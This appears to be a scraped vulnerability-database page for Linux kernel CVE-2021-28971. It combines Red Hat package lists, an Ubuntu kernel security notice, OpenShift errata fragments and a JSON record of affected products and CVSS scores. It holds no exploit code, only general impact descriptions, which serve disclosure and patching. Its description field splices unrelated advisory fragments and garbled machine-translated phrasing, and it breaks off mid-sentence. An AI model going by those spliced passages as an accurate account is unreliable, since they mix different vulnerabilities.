ppc64le: bpftool-4.18.0-348.el8.ppc64le.rpm bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-4.18.0-348.el8.ppc64le.rpm kernel-core-4.18.0-348.el8.ppc64le.rpm kernel-cross-headers-4.18.0-348.el8.ppc64le.rpm kernel-debug-4.18.0-348.el8.ppc64le.rpm kernel-debug-core-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-devel-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-4.18.0-348.el8.ppc64le.rpm kernel-debug-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-devel-4.18.0-348.el8.ppc64le.rpm kernel-headers-4.18.0-348.el8.ppc64le.rpm kernel-modules-4.18.0-348.el8.ppc64le.rpm kernel-modules-extra-4.18.0-348.el8.ppc64le.rpm kernel-tools-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-4.18.0-348.el8.ppc64le.rpm perf-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

s390x: bpftool-4.18.0-348.el8.s390x.rpm bpftool-debuginfo-4.18.0-348.el8.s390x.rpm kernel-4.18.0-348.el8.s390x.rpm kernel-core-4.18.0-348.el8.s390x.rpm kernel-cross-headers-4.18.0-348.el8.s390x.rpm kernel-debug-4.18.0-348.el8.s390x.rpm kernel-debug-core-4.18.0-348.el8.s390x.rpm kernel-debug-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debug-devel-4.18.0-348.el8.s390x.rpm kernel-debug-modules-4.18.0-348.el8.s390x.rpm kernel-debug-modules-extra-4.18.0-348.el8.s390x.rpm kernel-debuginfo-4.18.0-348.el8.s390x.rpm kernel-debuginfo-common-s390x-4.18.0-348.el8.s390x.rpm kernel-devel-4.18.0-348.el8.s390x.rpm kernel-headers-4.18.0-348.el8.s390x.rpm kernel-modules-4.18.0-348.el8.s390x.rpm kernel-modules-extra-4.18.0-348.el8.s390x.rpm kernel-tools-4.18.0-348.el8.s390x.rpm kernel-tools-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-core-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-debuginfo-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-devel-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-4.18.0-348.el8.s390x.rpm kernel-zfcpdump-modules-extra-4.18.0-348.el8.s390x.rpm perf-4.18.0-348.el8.s390x.rpm perf-debuginfo-4.18.0-348.el8.s390x.rpm python3-perf-4.18.0-348.el8.s390x.rpm python3-perf-debuginfo-4.18.0-348.el8.s390x.rpm

x86_64: bpftool-4.18.0-348.el8.x86_64.rpm bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-4.18.0-348.el8.x86_64.rpm kernel-core-4.18.0-348.el8.x86_64.rpm kernel-cross-headers-4.18.0-348.el8.x86_64.rpm kernel-debug-4.18.0-348.el8.x86_64.rpm kernel-debug-core-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-devel-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-4.18.0-348.el8.x86_64.rpm kernel-debug-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-devel-4.18.0-348.el8.x86_64.rpm kernel-headers-4.18.0-348.el8.x86_64.rpm kernel-modules-4.18.0-348.el8.x86_64.rpm kernel-modules-extra-4.18.0-348.el8.x86_64.rpm kernel-tools-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-4.18.0-348.el8.x86_64.rpm perf-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64: bpftool-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debug-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-348.el8.aarch64.rpm kernel-tools-debuginfo-4.18.0-348.el8.aarch64.rpm kernel-tools-libs-devel-4.18.0-348.el8.aarch64.rpm perf-debuginfo-4.18.0-348.el8.aarch64.rpm python3-perf-debuginfo-4.18.0-348.el8.aarch64.rpm

ppc64le: bpftool-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debug-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-debuginfo-common-ppc64le-4.18.0-348.el8.ppc64le.rpm kernel-tools-debuginfo-4.18.0-348.el8.ppc64le.rpm kernel-tools-libs-devel-4.18.0-348.el8.ppc64le.rpm perf-debuginfo-4.18.0-348.el8.ppc64le.rpm python3-perf-debuginfo-4.18.0-348.el8.ppc64le.rpm

x86_64: bpftool-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-348.el8.x86_64.rpm kernel-tools-debuginfo-4.18.0-348.el8.x86_64.rpm kernel-tools-libs-devel-4.18.0-348.el8.x86_64.rpm perf-debuginfo-4.18.0-348.el8.x86_64.rpm python3-perf-debuginfo-4.18.0-348.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBYYrdRdzjgjWX9erEAQhs0w//as9X4T+FCf3TAbcNIStxlOK6fbJoAlST FrgNJnRH3RmT+VxRSLWZcsJQf78kudeJWtMezbGSVREfhCMBCGhKZ7mvVp5P7J8l bobmdaap3hqkPqq66VuKxGuS+6j0rXXgGQH034yzoX+L/lx6KV9qdAnZZO+7kWcy SfX0GkLg0ARDMfsoUKwVmeUeNLhPlJ4ZH2rBdZ4FhjyEAG/5yL9JwU/VNReWHjhW HgarTuSnFR3vLQDKyjMIEEiBPOI162hS2j3Ba/A/1hJ70HOjloJnd0eWYGxSuIfC DRrzlacFNAzBPZsbRFi1plXrHh5LtNoBBWjl+xyb6jRsB8eXgS+WhzUhOXGUv01E lJTwFy5Kz71d+cAhRXgmz5gVgWuoNJw8AEImefWcy4n0EEK55vdFe0Sl7BfZiwpD Jhx97He6OurNnLrYyJJ0+TsU1L33794Ag2AJZnN1PLFUyrKKNlD1ZWtdsJg99klK dQteUTnnUhgDG5Tqulf0wX19BEkLd/O6CRyGueJcV4h4PFpSoWOh5Yy/BlokFzc8 zf14PjuVueIodaIUXtK+70Zmw7tg09Dx5Asyfuk5hWFPYv856nHlDn7PT724CU8v 1cp96h1IjLR6cF17NO2JCcbU0XZEW+aCkGkPcsY8DhBmaZqxUxXObvTD80Mm7EvN +PuV5cms0sE=2UUA -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-4948-1 May 11, 2021

linux-oem-5.10 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-oem-5.10: Linux kernel for OEM systems

Details:

Ryota Shiga discovered that the eBPF implementation in the Linux kernel did not properly verify that a BPF program only reserved as much memory for a ring buffer as was allocated. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3489)

Manfred Paul discovered that the eBPF implementation in the Linux kernel did not properly track bounds on bitwise operations. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3490)

Billy Jheng Bing-Jhong discovered that the io_uring implementation of the Linux kernel did not properly enforce the MAX_RW_COUNT limit in some situations. A local attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3491)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel contained a reference counting error. A local attacker could use this to cause a denial of service (system crash). (CVE-2020-25670)

Kiyin (尹亮) discovered that the NFC LLCP protocol implementation in the Linux kernel did not properly deallocate memory in certain error situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2020-25671, CVE-2020-25672)

It was discovered that the Xen paravirtualization backend in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-28688)

It was discovered that the io_uring subsystem in the Linux kernel contained a race condition leading to a deadlock condition. A local attacker could use this to cause a denial of service. (CVE-2021-28951)

John Stultz discovered that the audio driver for Qualcomm SDM845 systems in the Linux kernel did not properly validate port ID numbers. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28952)

Zygo Blaxell discovered that the btrfs file system implementation in the Linux kernel contained a race condition during certain cloning operations. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2021-28964)

Vince Weaver discovered that the perf subsystem in the Linux kernel did not properly handle certain PEBS records properly for some Intel Haswell processors. A local attacker could use this cause a denial of service (system crash). (CVE-2021-28971)

It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-28972)

It was discovered that the Freescale Gianfar Ethernet driver for the Linux kernel did not properly handle receive queue overrun when jumbo frames were enabled in some situations. An attacker could use this to cause a denial of service (system crash). An attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-29266)

It was discovered that the TIPC protocol implementation in the Linux kernel did not properly validate passed encryption key sizes. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29646)

It was discovered that the Qualcomm IPC router implementation in the Linux kernel did not properly initialize memory passed to user space. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-29647)

It was discovered that the BPF user mode driver implementation in the Linux kernel did not properly deallocate memory in some situations. A local attacker could use this to cause a denial of service (memory exhaustion). (CVE-2021-29649)

It was discovered that a race condition existed in the netfilter subsystem of the Linux kernel when replacing tables. A local attacker could use this to cause a denial of service (system crash). (CVE-2021-29650)

Felix Wilhelm discovered that the KVM implementation in the Linux kernel for AMD processors contained race conditions on nested VMCB controls. A local attacker in a guest vm could possibly use this to gain elevated privileges. (CVE-2021-29657)

Dan Carpenter discovered that the block device manager (dm) implementation in the Linux kernel contained a buffer overflow in the ioctl for listing devices. A privileged local attacker could use this to cause a denial of service (system crash). (CVE-2021-31916)

马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.10.0-1026-oem 5.10.0-1026.27 linux-image-oem-20.04b 5.10.0.1026.27

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-4948-1 CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2021-28688, CVE-2021-28951, CVE-2021-28952, CVE-2021-28964, CVE-2021-28971, CVE-2021-28972, CVE-2021-29264, CVE-2021-29266, CVE-2021-29646, CVE-2021-29647, CVE-2021-29649, CVE-2021-29650, CVE-2021-29657, CVE-2021-31916, CVE-2021-3483, CVE-2021-3489, CVE-2021-3490, CVE-2021-3491

Package Information: https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1026.27 . Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html

  1. Bugs fixed (https://bugzilla.redhat.com/):

1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment

  1. JIRA issues fixed (https://issues.jboss.org/):

LOG-1168 - Disable hostname verification in syslog TLS settings LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd LOG-1375 - ssl_ca_cert should be optional LOG-1378 - CLO should support sasl_plaintext(Password over http) LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate LOG-1494 - Syslog output is serializing json incorrectly LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing LOG-1735 - Regression introducing flush_at_shutdown LOG-1774 - The collector logs should be excluded in fluent.conf LOG-1776 - fluentd total_limit_size sets value beyond available space LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL LOG-1903 - Fix the Display of ClusterLogging type in OLM LOG-1911 - CLF API changes to Opt-in to multiline error detection LOG-1918 - Alert FluentdNodeDown always firing LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding

6

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1243",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.8"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "aff a250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff 500f",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "aff a250",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "aff 500f",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "gnu/linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "debian",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.11.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_a250_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_a250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:aff_500f_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:aff_500f:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2021-28971",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 4.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28971",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-388497",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 5.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2021-28971",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28971",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-1258",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-388497",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-28971",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388497"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28971"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1258"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28971"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled, aka CID-d88d05a9e0b6. Linux Kernel Exists in a resource exhaustion vulnerability. Vendor exploits this vulnerability CID-d88d05a9e0b6 It is published as.Service operation interruption (DoS) It may be in a state. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2021:4356-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:4356\nIssue date:        2021-11-09\nCVE Names:         CVE-2020-0427 CVE-2020-24502 CVE-2020-24503\n                   CVE-2020-24504 CVE-2020-24586 CVE-2020-24587\n                   CVE-2020-24588 CVE-2020-26139 CVE-2020-26140\n                   CVE-2020-26141 CVE-2020-26143 CVE-2020-26144\n                   CVE-2020-26145 CVE-2020-26146 CVE-2020-26147\n                   CVE-2020-27777 CVE-2020-29368 CVE-2020-29660\n                   CVE-2020-36158 CVE-2020-36386 CVE-2021-0129\n                   CVE-2021-3348 CVE-2021-3489 CVE-2021-3564\n                   CVE-2021-3573 CVE-2021-3600 CVE-2021-3635\n                   CVE-2021-3659 CVE-2021-3679 CVE-2021-3732\n                   CVE-2021-20194 CVE-2021-20239 CVE-2021-23133\n                   CVE-2021-28950 CVE-2021-28971 CVE-2021-29155\n                   CVE-2021-29646 CVE-2021-29650 CVE-2021-31440\n                   CVE-2021-31829 CVE-2021-31916 CVE-2021-33200\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, x86_64\n\n3. \n\nSecurity Fix(es):\n* kernel: out-of-bounds reads in pinctrl subsystem (CVE-2020-0427)\n* kernel: Improper input validation in some Intel(R) Ethernet E810 Adapter\ndrivers (CVE-2020-24502)\n* kernel: Insufficient access control in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24503)\n* kernel: Uncontrolled resource consumption in some Intel(R) Ethernet E810\nAdapter drivers (CVE-2020-24504)\n* kernel: Fragmentation cache not cleared on reconnection (CVE-2020-24586)\n* kernel: Reassembling fragments encrypted under different keys\n(CVE-2020-24587)\n* kernel: wifi frame payload being parsed incorrectly as an L2 frame\n(CVE-2020-24588)\n* kernel: Forwarding EAPOL from unauthenticated wifi client\n(CVE-2020-26139)\n* kernel: accepting plaintext data frames in protected networks\n(CVE-2020-26140)\n* kernel: not verifying TKIP MIC of fragmented frames (CVE-2020-26141)\n* kernel: accepting fragmented plaintext frames in protected networks\n(CVE-2020-26143)\n* kernel: accepting unencrypted A-MSDU frames that start 